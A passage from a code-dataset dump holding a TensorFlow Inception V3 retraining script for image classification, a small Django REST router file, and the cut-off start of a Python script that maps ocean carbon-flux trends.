'r:gz').extractall(dest_directory)\n\n\n# Creates a graph with the Inception V3 model, the bottleneck, jpeg_data and resize input tensors\ndef create_inception_graph():\n logger.info(\"Loading inception graph and creating bottleneck_tensor, jpeg_data and resized_input tensors\")\n with tf.Graph().as_default() as inception_graph:\n model_filename = os.path.join(FLAGS.model_dir, 'classify_image_graph_def.pb')\n with gfile.FastGFile(model_filename, 'rb') as f:\n graph_def = tf.GraphDef()\n graph_def.ParseFromString(f.read())\n bottleneck_tensor, jpeg_data_tensor, resized_input_tensor = (\n tf.import_graph_def(graph_def, name='', return_elements=[\n BOTTLENECK_TENSOR_NAME, JPEG_DATA_TENSOR_NAME, RESIZED_INPUT_TENSOR_NAME]))\n return inception_graph, bottleneck_tensor, jpeg_data_tensor, resized_input_tensor\n\n\n\"\"\"\nReads the image folder and creates a dictionary with the detected labels (key)\nand lists of images split by training, testing and validation.\n\"\"\"\ndef load_images(image_dir, testing_percentage, validation_percentage):\n logger.info(\"Loading images from {} using {}% for testing and {}% for validation\".format(image_dir, str(testing_percentage) , str(validation_percentage)))\n\n if not gfile.Exists(image_dir):\n logger.info(\"Image directory '\" + image_dir + \"' not found.\")\n return None\n\n # Map variable to return\n result = {}\n\n sub_dirs = [x[0] for x in gfile.Walk(image_dir)]\n\n is_root_dir = True\n for sub_dir in sub_dirs:\n if is_root_dir:\n # Skip root directory\n is_root_dir = False\n continue\n\n file_list = []\n dir_name = os.path.basename(sub_dir)\n\n if dir_name == image_dir:\n continue\n\n logger.info(\"Looking for images in {}\".format(dir_name))\n for extension in SUPPORTED_EXTENSIONS:\n file_glob = os.path.join(image_dir, dir_name, '*.' + extension)\n file_list.extend(gfile.Glob(file_glob))\n\n if not file_list:\n logger.info('No files found')\n continue\n\n if len(file_list) < MIN_NUM_IMAGES_PER_CLASS:\n logger.warning('Folder {} has less than {} images, which may cause issues.'.format(dir_name, MIN_NUM_IMAGES_PER_CLASS))\n elif len(file_list) > MAX_NUM_IMAGES_PER_CLASS:\n logger.info('WARNING: Folder {} has more than {} images. 
Some images will '\n 'never be selected.'.format(dir_name, MAX_NUM_IMAGES_PER_CLASS))\n\n training_images = []\n testing_images = []\n validation_images = []\n label_name = re.sub(r'[^a-z0-9]+', ' ', dir_name.lower())\n\n for file_name in file_list:\n base_name = os.path.basename(file_name)\n hash_name = re.sub(r'_nohash_.*$', '', file_name)\n hash_name_hashed = hashlib.sha1(compat.as_bytes(hash_name)).hexdigest()\n percentage_hash = (\n (int(hash_name_hashed, 16) % (MAX_NUM_IMAGES_PER_CLASS + 1)) * (100.0 / MAX_NUM_IMAGES_PER_CLASS)\n )\n\n if percentage_hash < validation_percentage:\n validation_images.append(base_name)\n elif percentage_hash < (testing_percentage + validation_percentage):\n testing_images.append(base_name)\n else:\n training_images.append(base_name)\n\n # ADD MAP ENTRY\n result[label_name] = {\n 'dir': dir_name,\n 'training': training_images,\n 'testing': testing_images,\n 'validation': validation_images,\n }\n\n # LOG\n for key in result:\n logger.info(\"Found category \" + key)\n value = result[key]\n logger.info(\"Found {} for training, {} for testing and {} for validation\".format(\n str(len(value[\"training\"])),\n str(len(value[\"testing\"])),\n str(len(value[\"validation\"]))\n ))\n\n return result\n\n\n'''\nChecks if image distortions need to be applied using:\n\n- flip_left_right: Boolean whether to randomly mirror images horizontally.\n- random_crop: Integer percentage setting the total margin used around the crop box.\n- random_scale: Integer percentage of how much to vary the scale by.\n- random_brightness: Integer range to randomly multiply the pixel values by.\n'''\ndef distort_images(flip_left_right, random_crop, random_scale, random_brightness):\n return (flip_left_right or (random_crop != 0) or (random_scale != 0) or (random_brightness != 0))\n\n'''\nFrom TF doc:\nA bottleneck is an informal term used for a layer previous to the final output layer that actually does the classification.\nThis layer has been trained to output a set of values that's good enough for the classifier to use to distinguish between all the classes it's been asked to recognize.\nIt has to be a meaningful and compact summary of the images, since it has to contain enough information for the classifier to make a good choice in a very small set of values.\n\nBecause every image is reused multiple times during training and calculating each bottleneck takes a significant amount of time,\nit speeds things up to cache these bottleneck values on disk so they don't have to be repeatedly recalculated.\nIf you rerun the script they'll be reused.\n'''\ndef determine_and_cache_bottlenecks(sess, image_lists, image_dir, bottleneck_dir, jpeg_data_tensor, bottleneck_tensor):\n logging.info(\"Determine and cache bottlenecks\")\n how_many_bottlenecks = 0\n ensure_dir_exists(bottleneck_dir)\n for label_name, label_lists in image_lists.items():\n for category in ['training', 'testing', 'validation']:\n category_list = label_lists[category]\n for index, unused_base_name in enumerate(category_list):\n get_or_create_bottleneck(sess, image_lists, label_name, index, image_dir, category, bottleneck_dir, jpeg_data_tensor, bottleneck_tensor)\n how_many_bottlenecks += 1\n if how_many_bottlenecks % 100 == 0:\n logger.info('{} bottleneck files created for {}.'.format(str(how_many_bottlenecks), category))\n\n\ndef ensure_dir_exists(dir_name):\n if not os.path.exists(dir_name):\n os.makedirs(dir_name)\n\n\n'''\nUse existing bottleneck or create a new one.\n'''\ndef get_or_create_bottleneck(sess, image_lists, 
label_name, index, image_dir, category, bottleneck_dir, jpeg_data_tensor, bottleneck_tensor):\n label_lists = image_lists[label_name]\n sub_dir = label_lists['dir']\n sub_dir_path = os.path.join(bottleneck_dir, sub_dir)\n ensure_dir_exists(sub_dir_path)\n bottleneck_path = get_bottleneck_path(image_lists, label_name, index, bottleneck_dir, category)\n\n if not os.path.exists(bottleneck_path):\n create_bottleneck_file(bottleneck_path, image_lists, label_name, index, image_dir, category, sess, jpeg_data_tensor, bottleneck_tensor)\n\n with open(bottleneck_path, 'r') as bottleneck_file:\n bottleneck_string = bottleneck_file.read()\n\n error = False\n try:\n bottleneck_values = [float(x) for x in bottleneck_string.split(',')]\n except ValueError:\n logger.info('Invalid float found, recreating bottleneck')\n error = True\n\n if error:\n create_bottleneck_file(bottleneck_path, image_lists, label_name, index, image_dir, category, sess, jpeg_data_tensor, bottleneck_tensor)\n with open(bottleneck_path, 'r') as bottleneck_file:\n bottleneck_string = bottleneck_file.read()\n\n bottleneck_values = [float(x) for x in bottleneck_string.split(',')]\n\n return bottleneck_values\n\n\ndef get_bottleneck_path(image_lists, label_name, index, bottleneck_dir, category):\n return get_image_path(image_lists, label_name, index, bottleneck_dir, category) + '.txt'\n\n\ndef get_image_path(image_lists, label_name, index, image_dir, category):\n if label_name not in image_lists:\n tf.logging.fatal('Label does not exist %s.', label_name)\n\n label_lists = image_lists[label_name]\n if category not in label_lists:\n tf.logging.fatal('Category does not exist %s.', category)\n\n category_list = label_lists[category]\n if not category_list:\n tf.logging.fatal('Label %s has no images in the category %s.',\n label_name, category)\n\n mod_index = index % len(category_list)\n base_name = category_list[mod_index]\n sub_dir = label_lists['dir']\n full_path = os.path.join(image_dir, sub_dir, base_name)\n return full_path\n\n\ndef create_bottleneck_file(bottleneck_path, image_lists, label_name, index, image_dir, category, sess, jpeg_data_tensor, bottleneck_tensor):\n logger.info(\"Creating bottleneck for {} at file {}\".format(label_name, bottleneck_path))\n image_path = get_image_path(image_lists, label_name, index, image_dir, category)\n\n if not gfile.Exists(image_path):\n tf.logging.fatal('File does not exist %s', image_path)\n\n image_data = gfile.FastGFile(image_path, 'rb').read()\n try:\n bottleneck_values = run_bottleneck_on_image(sess, image_data, jpeg_data_tensor, bottleneck_tensor)\n except:\n raise RuntimeError('Error during processing file %s' % image_path)\n\n bottleneck_string = ','.join(str(x) for x in bottleneck_values)\n with open(bottleneck_path, 'w') as bottleneck_file:\n bottleneck_file.write(bottleneck_string)\n\n\n# Runs inference on an image to extract the bottleneck summary.\ndef run_bottleneck_on_image(sess, image_data, image_data_tensor, bottleneck_tensor):\n bottleneck_values = sess.run(bottleneck_tensor, {image_data_tensor: image_data})\n bottleneck_values = np.squeeze(bottleneck_values)\n return bottleneck_values\n\n'''\nAdds a new softmax layer for training in order to retrain the model to identify the specific classes.\nBased on: https://tensorflow.org/versions/master/tutorials/mnist/beginners/index.html\n'''\ndef add_new_layer(class_count, final_tensor_name, bottleneck_tensor):\n logger.info(\"Adding new layer '{}' to be trained for {} classes\".format(final_tensor_name, class_count))\n\n with 
tf.name_scope('input'):\n bottleneck_input = tf.placeholder_with_default( bottleneck_tensor, shape=[None, BOTTLENECK_TENSOR_SIZE], name='BottleneckInputPlaceholder')\n ground_truth_input = tf.placeholder(tf.float32, [None, class_count], name='GroundTruthInput')\n\n layer_name = 'final_training_ops'\n with tf.name_scope(layer_name):\n\n with tf.name_scope('weights'):\n initial_value = tf.truncated_normal([BOTTLENECK_TENSOR_SIZE, class_count], stddev=0.001)\n layer_weights = tf.Variable(initial_value, name='final_weights')\n variable_summaries(layer_weights)\n\n with tf.name_scope('biases'):\n layer_biases = tf.Variable(tf.zeros([class_count]), name='final_biases')\n variable_summaries(layer_biases)\n\n with tf.name_scope('Wx_plus_b'):\n logits = tf.matmul(bottleneck_input, layer_weights) + layer_biases\n tf.summary.histogram('pre_activations', logits)\n\n final_tensor = tf.nn.softmax(logits, name=final_tensor_name)\n tf.summary.histogram('activations', final_tensor)\n\n with tf.name_scope('cross_entropy'):\n cross_entropy = tf.nn.softmax_cross_entropy_with_logits_v2(labels=ground_truth_input, logits=logits)\n\n with tf.name_scope('total'):\n cross_entropy_mean = tf.reduce_mean(cross_entropy)\n\n tf.summary.scalar('cross_entropy', cross_entropy_mean)\n\n with tf.name_scope('train'):\n optimizer = tf.train.GradientDescentOptimizer(FLAGS.learning_rate)\n train_step = optimizer.minimize(cross_entropy_mean)\n\n return (train_step, cross_entropy_mean, bottleneck_input, ground_truth_input, final_tensor)\n\n\ndef add_evaluation_step(result_tensor, ground_truth_tensor):\n logger.info(\"Adding evaluation step\")\n with tf.name_scope('accuracy'):\n with tf.name_scope('correct_prediction'):\n prediction = tf.argmax(result_tensor, 1)\n correct_prediction = tf.equal( prediction, tf.argmax(ground_truth_tensor, 1))\n with tf.name_scope('accuracy'):\n evaluation_step = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))\n tf.summary.scalar('accuracy', evaluation_step)\n return evaluation_step, prediction\n\n\n'''\nIf no distortions are applied, retrieve the cached bottleneck from disk for images.\nPick a random set of images from the specified category.\n'''\ndef get_random_cached_bottlenecks(sess, image_lists, how_many, category, bottleneck_dir, image_dir, jpeg_data_tensor, bottleneck_tensor):\n class_count = len(image_lists.keys())\n bottlenecks = []\n ground_truths = []\n filenames = []\n\n if how_many >= 0:\n for unused_i in range(how_many):\n label_index = random.randrange(class_count)\n label_name = list(image_lists.keys())[label_index]\n image_index = random.randrange(MAX_NUM_IMAGES_PER_CLASS + 1)\n image_name = get_image_path(image_lists, label_name, image_index, image_dir, category)\n bottleneck = get_or_create_bottleneck(sess, image_lists, label_name,\n image_index, image_dir, category,\n bottleneck_dir, jpeg_data_tensor,\n bottleneck_tensor)\n ground_truth = np.zeros(class_count, dtype=np.float32)\n ground_truth[label_index] = 1.0\n bottlenecks.append(bottleneck)\n ground_truths.append(ground_truth)\n filenames.append(image_name)\n else:\n for label_index, label_name in enumerate(image_lists.keys()):\n for image_index, image_name in enumerate(\n image_lists[label_name][category]):\n image_name = get_image_path(image_lists, label_name, image_index, image_dir, category)\n bottleneck = get_or_create_bottleneck(sess, image_lists, label_name,\n image_index, image_dir, category,\n bottleneck_dir, jpeg_data_tensor,\n bottleneck_tensor)\n ground_truth = np.zeros(class_count, dtype=np.float32)\n 
ground_truth[label_index] = 1.0\n bottlenecks.append(bottleneck)\n ground_truths.append(ground_truth)\n filenames.append(image_name)\n return bottlenecks, ground_truths, filenames\n\n\n\"\"\"\nIf distortions are applied, recalculate the full model for every image, the cached bottleneck cannot be used.\nGet random images for the requested category, run them through the distortion graph, and then the full graph to get the bottleneck results for each.\n\"\"\"\ndef get_random_distorted_bottlenecks(sess, image_lists, how_many, category, image_dir, input_jpeg_tensor, distorted_image, resized_input_tensor, bottleneck_tensor):\n class_count = len(image_lists.keys())\n bottlenecks = []\n ground_truths = []\n\n for unused_i in range(how_many):\n label_index = random.randrange(class_count)\n label_name = list(image_lists.keys())[label_index]\n image_index = random.randrange(MAX_NUM_IMAGES_PER_CLASS + 1)\n image_path = get_image_path(image_lists, label_name, image_index, image_dir, category)\n\n if not gfile.Exists(image_path):\n tf.logging.fatal('File does not exist %s', image_path)\n\n jpeg_data = gfile.FastGFile(image_path, 'rb').read()\n distorted_image_data = sess.run(distorted_image, {input_jpeg_tensor: jpeg_data})\n bottleneck = run_bottleneck_on_image(sess, distorted_image_data,\n resized_input_tensor,\n bottleneck_tensor)\n ground_truth = np.zeros(class_count, dtype=np.float32)\n ground_truth[label_index] = 1.0\n bottlenecks.append(bottleneck)\n ground_truths.append(ground_truth)\n return bottlenecks, ground_truths\n\n\n\"\"\" Construct a network of operations to apply them to an image.\n\n If the distortions are to be applied, apply crops, scales and brightness changes to support real world variations and, thus, have a more effective model.\n\n Cropping\n\n Place a box at a random position in the full image. The cropping parameter controls the size of that box in relation to the input image.\n - If it's zero, then the box is the same size as the input.\n - If the value is 50%, then the crop box will be half the width and height of the input.\n\n Scaling\n\n Like cropping, but the box is always centered and its size varies randomly within the given range.\n - If the scale percentage is zero, the box is the same size as the input.\n - If If it's 50%, then the box will be in a random range between half the width and height and full size.\n\n Params:\n - flip_left_right: Boolean whether to randomly mirror images horizontally.\n - random_crop: Integer percentage setting the total margin used around the crop box.\n - random_scale: Integer percentage of how much to vary the scale by.\n - random_brightness: Integer range to randomly multiply the pixel values by graph.\n \"\"\"\ndef add_input_distortions(flip_left_right, random_crop, random_scale, random_brightness):\n logger.info(\"Adding distortions. 
Flip: {}, crop {}%, scale {}%, brigthness {}%\".format(flip_left_right, random_crop, random_scale, random_brightness))\n jpeg_data = tf.placeholder(tf.string, name='DistortJPGInput')\n decoded_image = tf.image.decode_jpeg(jpeg_data, channels=MODEL_INPUT_DEPTH)\n decoded_image_as_float = tf.cast(decoded_image, dtype=tf.float32)\n decoded_image_4d = tf.expand_dims(decoded_image_as_float, 0)\n\n margin_scale = 1.0 + (random_crop / 100.0)\n resize_scale = 1.0 + (random_scale / 100.0)\n margin_scale_value = tf.constant(margin_scale)\n resize_scale_value = tf.random_uniform(tensor_shape.scalar(),\n minval=1.0,\n maxval=resize_scale)\n scale_value = tf.multiply(margin_scale_value, resize_scale_value)\n\n precrop_width = tf.multiply(scale_value, MODEL_INPUT_WIDTH)\n precrop_height = tf.multiply(scale_value, MODEL_INPUT_HEIGHT)\n precrop_shape = tf.stack([precrop_height, precrop_width])\n precrop_shape_as_int = tf.cast(precrop_shape, dtype=tf.int32)\n precropped_image = tf.image.resize_bilinear(decoded_image_4d, precrop_shape_as_int)\n precropped_image_3d = tf.squeeze(precropped_image, squeeze_dims=[0])\n cropped_image = tf.random_crop(precropped_image_3d, [MODEL_INPUT_HEIGHT, MODEL_INPUT_WIDTH, MODEL_INPUT_DEPTH])\n\n if flip_left_right:\n flipped_image = tf.image.random_flip_left_right(cropped_image)\n else:\n flipped_image = cropped_image\n\n brightness_min = 1.0 - (random_brightness / 100.0)\n brightness_max = 1.0 + (random_brightness / 100.0)\n brightness_value = tf.random_uniform(tensor_shape.scalar(),\n minval=brightness_min,\n maxval=brightness_max)\n brightened_image = tf.multiply(flipped_image, brightness_value)\n distort_result = tf.expand_dims(brightened_image, 0, name='DistortResult')\n return jpeg_data, distort_result\n\n\ndef variable_summaries(var):\n \"\"\"Attach a lot of summaries to a Tensor (for TensorBoard visualization).\"\"\"\n with tf.name_scope('summaries'):\n mean = tf.reduce_mean(var)\n tf.summary.scalar('mean', mean)\n with tf.name_scope('stddev'):\n stddev = tf.sqrt(tf.reduce_mean(tf.square(var - mean)))\n tf.summary.scalar('stddev', stddev)\n tf.summary.scalar('max', tf.reduce_max(var))\n tf.summary.scalar('min', tf.reduce_min(var))\n tf.summary.histogram('histogram', var)\n\n\ndef main(_):\n if tf.gfile.Exists(FLAGS.summaries_dir):\n tf.gfile.DeleteRecursively(FLAGS.summaries_dir)\n tf.gfile.MakeDirs(FLAGS.summaries_dir)\n\n detect_devices()\n\n # Set up the pre-trained graph.\n download_inception_v3()\n\n inception_graph, bottleneck_tensor, jpeg_data_tensor, resized_image_tensor = (create_inception_graph())\n image_lists = load_images(FLAGS.image_dir, FLAGS.testing_percentage, FLAGS.validation_percentage)\n class_count = len(image_lists.keys())\n\n if class_count == 0:\n logger.info('No valid folders of images found at ' + FLAGS.image_dir)\n return -1\n if class_count == 1:\n logger.info('Only one valid folder of images found at ' + FLAGS.image_dir +\n ' - multiple classes are needed for classification.')\n return -1\n\n # Check if distortions should be applied.\n distort_image_enabled = distort_images(FLAGS.flip_left_right, FLAGS.random_crop, FLAGS.random_scale, FLAGS.random_brightness)\n logger.info(\"Apply distortions: {}\".format(distort_image_enabled))\n\n with tf.Session(graph = inception_graph) as sess:\n\n if distort_image_enabled:\n # Create distortions\n (distorted_jpeg_data_tensor, distorted_image_tensor) = add_input_distortions(FLAGS.flip_left_right,\n FLAGS.random_crop,\n FLAGS.random_scale,\n FLAGS.random_brightness)\n else:\n # Determine and cache 
bottleneck images\n determine_and_cache_bottlenecks(sess, image_lists, FLAGS.image_dir, FLAGS.bottleneck_dir, jpeg_data_tensor, bottleneck_tensor)\n\n # Add new layer to train\n (train_step, cross_entropy, bottleneck_input, ground_truth_input, final_tensor) = add_new_layer(\n len(image_lists.keys()), FLAGS.final_tensor_name, bottleneck_tensor)\n\n # Add evaluation the new layer\n evaluation_step, prediction = add_evaluation_step(final_tensor, ground_truth_input)\n\n # Write down summaries\n merged = tf.summary.merge_all()\n\n logger.info(\"Writing down train summary at {}\".format(FLAGS.summaries_dir + '/train'))\n train_writer = tf.summary.FileWriter(FLAGS.summaries_dir + '/train', sess.graph)\n\n logger.info(\"Writing down validation summary at {}\".format(FLAGS.summaries_dir + '/validation'))\n validation_writer = tf.summary.FileWriter(FLAGS.summaries_dir + '/validation')\n\n # Init weights\n sess.run(tf.global_variables_initializer())\n\n # Init simple output file\n if os.path.exists(outputFilePath):\n os.remove(outputFilePath)\n\n outputFile = open(outputFilePath, \"w\")\n outputFile.write(\"step,train_accuracy,cross_entropy,validation_accuracy\\n\")\n\n # TRAIN USING THE REQUIRED STEPS QUANTITY\n logger.info(\"Training using {} steps\".format(FLAGS.training_steps))\n for i in range(FLAGS.training_steps):\n if distort_image_enabled:\n (train_bottlenecks, train_ground_truth) = get_random_distorted_bottlenecks(\n sess, image_lists, FLAGS.train_batch_size, 'training',\n FLAGS.image_dir, distorted_jpeg_data_tensor,\n distorted_image_tensor, resized_image_tensor, bottleneck_tensor)\n else:\n (train_bottlenecks, train_ground_truth, _) = get_random_cached_bottlenecks(\n sess, image_lists, FLAGS.train_batch_size, 'training',\n FLAGS.bottleneck_dir, FLAGS.image_dir, jpeg_data_tensor,\n bottleneck_tensor)\n\n train_summary, _ = sess.run([merged, train_step], feed_dict={bottleneck_input: train_bottlenecks,\n ground_truth_input: train_ground_truth})\n train_writer.add_summary(train_summary, i)\n\n train_accuracy, cross_entropy_value = sess.run([evaluation_step, cross_entropy],\n feed_dict={bottleneck_input: train_bottlenecks,\n ground_truth_input: train_ground_truth})\n\n logger.info('Step %d: Train accuracy = %.1f%%' % (i, train_accuracy * 100))\n logger.info('Step %d: Cross entropy = %f' % (i, cross_entropy_value))\n\n validation_bottlenecks, validation_ground_truth, _ = (\n get_random_cached_bottlenecks(sess, image_lists, FLAGS.validation_batch_size, 'validation',\n FLAGS.bottleneck_dir, FLAGS.image_dir, jpeg_data_tensor, bottleneck_tensor)\n )\n\n validation_summary, validation_accuracy = sess.run([merged, evaluation_step], feed_dict={bottleneck_input: validation_bottlenecks,\n ground_truth_input: validation_ground_truth})\n validation_writer.add_summary(validation_summary, i)\n\n outputFile.write(\"{},{},{},{}\\n\".format(i, train_accuracy, cross_entropy_value, validation_accuracy))\n logger.info('Step %d: Validation accuracy = %.1f%% (N=%d)' % (i, validation_accuracy * 100, len(validation_bottlenecks)))\n logger.info('==============================================================')\n\n\n # TRAINING COMPLETE\n\n outputFile.close()\n\n # Run evaluation with some new images not used before.\n logger.info(\"Training complete. 
Running evaluation using {} new images\".format(FLAGS.test_batch_size))\n test_bottlenecks, test_ground_truth, test_filenames = (\n get_random_cached_bottlenecks(sess, image_lists, FLAGS.test_batch_size, 'testing', FLAGS.bottleneck_dir,\n FLAGS.image_dir, jpeg_data_tensor, bottleneck_tensor))\n\n test_accuracy, predictions = sess.run( [evaluation_step, prediction], feed_dict={bottleneck_input: test_bottlenecks, ground_truth_input: test_ground_truth})\n logger.info('Final test accuracy = %.1f%% (N=%d)' % (test_accuracy * 100, len(test_bottlenecks)))\n\n if FLAGS.print_misclassified_test_images:\n logger.info('=== MISCLASSIFIED TEST IMAGES ===')\n for i, test_filename in enumerate(test_filenames):\n if predictions[i] != test_ground_truth[i].argmax():\n logger.info('%70s %s' % (test_filename, list(image_lists.keys())[predictions[i]]))\n\n # Write out the trained graph and labels with the weights stored as constants.\n\n logger.info(\"Writing final model\")\n output_graph_def = graph_util.convert_variables_to_constants(sess, inception_graph.as_graph_def(), [FLAGS.final_tensor_name])\n\n with gfile.FastGFile(FLAGS.output_graph, 'wb') as f:\n f.write(output_graph_def.SerializeToString())\n\n with gfile.FastGFile(FLAGS.output_labels, 'w') as f:\n f.write('\\n'.join(image_lists.keys()) + '\\n')\n\n logger.info(\"FINISHED\")\n\n\ndef add_arg_param(parser, option, type, default, help, action=None):\n if action is not None:\n if type is not None:\n parser.add_argument(\n option,\n type=type,\n default=default,\n help=help,\n action=action\n )\n else:\n parser.add_argument(\n option,\n default=default,\n help=help,\n action=action\n )\n else:\n if type is not None:\n parser.add_argument(\n option,\n type=type,\n default=default,\n help=help\n )\n else:\n parser.add_argument(\n option,\n default=default,\n help=help\n )\n\n\nif __name__ == '__main__':\n # COMMAND LINE PARAMETERS PARSER\n parser = argparse.ArgumentParser()\n add_arg_param(parser, '--image_dir', str, '', 'Path to folders of labeled images.')\n add_arg_param(parser, '--output_graph', str, 'tf_files/output_graph.pb', 'Where to save the trained graph.')\n add_arg_param(parser, '--output_labels', str, 'tf_files/output_labels.txt', 'Where to save the trained graph\\'s labels.')\n add_arg_param(parser, '--summaries_dir', str, 'tf_files/retrain_logs', 'Where to save summary logs for TensorBoard.')\n add_arg_param(parser, '--training_steps', int, 4000, 'How many training steps to run before ending.')\n add_arg_param(parser, '--learning_rate', float, 0.01, 'How large a learning rate to use when training.')\n add_arg_param(parser, '--testing_percentage', int, 10, 'What percentage of images to use as a test set.')\n add_arg_param(parser, '--validation_percentage', int, 10, 'What percentage of images to use as a validation set.')\n add_arg_param(parser, '--eval_step_interval', int, 10, 'How often to evaluate the training results.')\n add_arg_param(parser, '--train_batch_size', int, 100, 'How many images to train on at a time.')\n add_arg_param(parser, '--test_batch_size', int, -1, \"\"\"\\\n How many images to test on. This test set is only used once, to evaluate\n the final accuracy of the model after training completes.\n A value of -1 causes the entire test set to be used, which leads to more\n stable results across runs.\\\n \"\"\")\n add_arg_param(parser, '--validation_batch_size', int, 100, \"\"\"\\\n How many images to use in an evaluation batch. 
This validation set is\n used much more often than the test set, and is an early indicator of how\n accurate the model is during training.\n A value of -1 causes the entire validation set to be used, which leads to\n more stable results across training iterations, but may be slower on large\n training sets.\\\n \"\"\")\n add_arg_param(parser, '--print_misclassified_test_images', None, False, \"Whether to print out a list of all misclassified test images.\", 'store_true')\n add_arg_param(parser, '--model_dir', str, '/tmp/imagenet', \"\"\"\\\n Path to classify_image_graph_def.pb,\n imagenet_synset_to_human_label_map.txt, and\n imagenet_2012_challenge_label_map_proto.pbtxt.\\\n \"\"\")\n add_arg_param(parser, '--bottleneck_dir', str, './tf_files/bottleneck', 'Path to cache bottleneck layer values as files.')\n add_arg_param(parser, '--final_tensor_name', str, 'final_result', \"The name of the output classification layer in the retrained graph.\")\n add_arg_param(parser, '--flip_left_right', None, False, \"Whether to randomly flip half of the training images horizontally.\", 'store_true')\n add_arg_param(parser, '--random_crop', int, 0, \"A percentage determining how much of a margin to randomly crop off the training images.\")\n add_arg_param(parser, '--random_scale', int, 0, \"A percentage determining how much to randomly scale up the size of the training images by.\")\n add_arg_param(parser, '--random_brightness', int, 0, \"A percentage determining how much to randomly multiply the training image input pixels up or down by.\")\n\n FLAGS, unparsed = parser.parse_known_args()\n tf.app.run(main=main, argv=[sys.argv[0]] + unparsed)\n","repo_name":"nacho270/convolutional-sex-detector","sub_path":"convolution/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":34894,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"20797795572","text":"from django.conf import settings\nfrom rest_framework.routers import DefaultRouter, SimpleRouter\n\nfrom .viewsets import UserViewSet\n\nurlpatterns = []\n\nif settings.DEBUG:\n router = DefaultRouter()\nelse:\n router = SimpleRouter()\n\nrouter.register(\"users\", UserViewSet, basename=\"users\")\n\nurlpatterns += router.urls\n","repo_name":"djangoflow/demo-django","sub_path":"src/apps/accounts/drf/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":317,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"40331924660","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Apr 1 10:40:28 2020\n@author: Nic Pittman\n\nThis code will reproduce Figure 4 in Pittman et al., 2021. \n\nTrends and pvalues are calculated on the fly and not saved anywhere, however could be done easily. \nregridded data is required for this process\n\nThis results in a slower script but works well. 
All of the processing occurs in the main function.\nEasy to call modified version of this figure.\n\nProduces mean, trend and pval (Stipples) for the following:\n \n figs/Figure4_Spatial_map_update_'+ratio.name+'.png\n \n air-sea flux\n new production \n difference is calculated here\n SST\n TPCA chlorophyll (regridded) \n carbon (as processed into grams)\n \nRequires: \n datasets/co2/landschutzer_co2/spco2_MPI-SOM_FFN_v2020.nc\n processed/seamask.nc\n processed/flux/fratios.nc\n \n processed/flux/avg_npp_rg_cafe.nc'\n processed/flux/tpca.nc\n datasets/sst/sst.mnmean.nc\n processed/flux/pco2grams.nc\n\"\"\"\n \nimport numpy as np\nimport pandas as pd\nimport xarray as xr\nimport matplotlib.pyplot as plt\nfrom carbon_math import *\nfrom mpl_toolkits.basemap import Basemap\nfrom scipy.stats import linregress\nfrom scipy.stats import ttest_ind, ttest_rel\n#from windspharm.xarray import VectorWind\nimport matplotlib\n\nclass OOMFormatter(matplotlib.ticker.ScalarFormatter):\n def __init__(self, order=0, fformat=\"%1.1f\", offset=True, mathText=True):\n self.oom = order\n self.fformat = fformat\n matplotlib.ticker.ScalarFormatter.__init__(self,useOffset=offset,useMathText=mathText)\n def _set_order_of_magnitude(self):\n self.orderOfMagnitude = self.oom\n def _set_format(self, vmin=None, vmax=None):\n self.format = self.fformat\n if self._useMathText:\n self.format = r'$\\mathdefault{%s}$' % self.format\n\n\n\n\ndef plot_basemap():\n m = Basemap(llcrnrlon=120.,llcrnrlat=-15,urcrnrlon=290,urcrnrlat=15.01,\n resolution='l',projection='merc',fix_aspect=False)\n m.drawcoastlines()\n m.fillcontinents()\n # draw parallels # labels = [left,right,top,bottom]\n m.drawparallels(np.arange(-20,21,10),labels=[1,0,1,1],fontsize=12,latmax=20)\n m.drawmeridians(np.arange(-180,180,30),labels=[0,0,0,1],fontsize=12)\n return m\n\n\n\ndef plot_basemap_row(fig,\n axn,\n hovmol,\n mean,\n units,\n title,\n levs=None,\n\n trend_conversion=None,\n sb1=7,\n sb2=3,\n cmap='viridis',\n cmaptr='RdBu_r',\n wu=None,wv=None,\n wu_all=None,wv_all=None):\n '''\n Create a plotting function to make it repeatable and nicer\n colormaps should either be viridis or RdBu_r\n axis (number) will be 1,3,5,7 (plots both avg and trend at once)\n \n Unfortunately this function does the processing of mean, trends and pvals on the fly.\n Could save these if needed, but not provided here. 
\n '''\n fr=0.03\n fs=12\n ms=10\n startday=np.datetime64('2000-01-01')\n \n if title.endswith('pCO2t'):\n endday=np.datetime64('2016-12-01') \n print(title)\n elif title.endswith('chlorophyll'):\n endday=np.datetime64('2017-12-01')\n else:\n endday=np.datetime64('2020-01-01') \n \n hovmol=hovmol.sel(time=slice(startday,endday))\n if wu is not None:\n wu=wu.sel(time=slice(startday,endday))\n wv=wv.sel(time=slice(startday,endday))\n wu_all=wu_all.sel(time=slice(startday,endday))\n wv_all=wv_all.sel(time=slice(startday,endday))\n \n ax1=fig.add_subplot(sb1,sb2,axn)\n m=plot_basemap()\n\n \n lo,la=np.meshgrid(hovmol.lon.values,hovmol.lat.values)\n lo1,la1=m(lo,la)\n \n if type(levs)==type(None):\n f=m.contourf(lo1,la1,hovmol.mean(dim='time')-mean.mean(dim='time'),cmap=cmap,extend='both') #11 colors\n #Quick anti-aliasing fix as per: https://stackoverflow.com/questions/15822159/aliasing-when-saving-matplotlib-filled-contour-plot-to-pdf-or-eps\n for c in f.collections:\n c.set_edgecolor(\"face\")\n else:\n if title=='TPCA Chlorophyll':\n f=m.contourf(lo1,la1,hovmol.mean(dim='time')-mean.mean(dim='time'),extend='both',cmap=cmap,levels=levs) #11 colors\n #Quick anti-aliasing fix as per: https://stackoverflow.com/questions/15822159/aliasing-when-saving-matplotlib-filled-contour-plot-to-pdf-or-eps\n for c in f.collections:\n c.set_edgecolor(\"face\")\n else:\n \n f=m.contourf(lo1,la1,hovmol.mean(dim='time')-mean.mean(dim='time'),cmap=cmap,levels=levs,extend='both') #11 colors\n #Quick anti-aliasing fix as per: https://stackoverflow.com/questions/15822159/aliasing-when-saving-matplotlib-filled-contour-plot-to-pdf-or-eps\n for c in f.collections:\n c.set_edgecolor(\"face\")\n ax1.axhline(0,c='k',linestyle=':')\n\n moorings=[165,190,205,220,235,250]\n for x in moorings:\n x1,y1=m(x,0)\n 